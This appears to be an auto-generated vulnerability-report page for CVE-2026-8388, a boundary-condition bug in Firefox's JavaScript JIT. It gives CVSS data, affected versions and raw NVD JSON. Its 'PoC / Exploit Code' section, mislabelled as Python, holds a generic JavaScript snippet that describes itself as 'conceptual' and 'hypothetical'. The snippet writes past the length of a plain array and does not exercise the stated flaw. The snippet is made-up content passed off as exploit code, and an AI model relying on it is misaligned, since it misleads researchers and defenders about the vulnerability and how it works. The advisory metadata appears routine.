Security Vulnerability Report
中文
CVE-2026-8388 CVSS 6.5 MEDIUM

CVE-2026-8388

Published: 2026-05-12 14:17:12
Last Modified: 2026-05-12 19:48:21

Description

Incorrect boundary conditions in the JavaScript Engine: JIT component. This vulnerability was fixed in Firefox 150.0.3.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:mozilla:firefox:*:*:*:*:-:*:*:* - VULNERABLE
Mozilla Firefox < 150.0.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
/** * Conceptual PoC for CVE-2026-8388 * Triggers JIT boundary condition issue in Firefox < 150.0.3 */ function triggerVuln() { // Prepare array to trigger JIT optimization let arr = new Array(100).fill(1.1); // Function to be compiled by JIT function vulnerableFunc(idx, val) { // Hypothetical scenario where JIT fails to validate bounds if (idx >= 0) { arr[idx] = val; // Potential OOB write } } // Warm up function to trigger JIT compilation for (let i = 0; i < 10000; i++) { vulnerableFunc(1, 2.2); } // Trigger the vulnerability with an out-of-bounds index try { vulnerableFunc(0xFFFF, 3.3); console.log("PoC executed"); } catch (e) { console.log("Exception caught"); } } triggerVuln();

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-8388", "sourceIdentifier": "[email protected]", "published": "2026-05-12T14:17:11.813", "lastModified": "2026-05-12T19:48:21.497", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Incorrect boundary conditions in the JavaScript Engine: JIT component. This vulnerability was fixed in Firefox 150.0.3."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-119"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:firefox:*:*:*:*:-:*:*:*", "versionEndExcluding": "150.0.3", "matchCriteriaId": "B13F359A-1C15-48B4-8319-AD42CC852E8C"}]}]}], "references": [{"url": "https://bugzilla.mozilla.org/show_bug.cgi?id=2036978", "source": "[email protected]", "tags": ["Permissions Required"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-45/", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}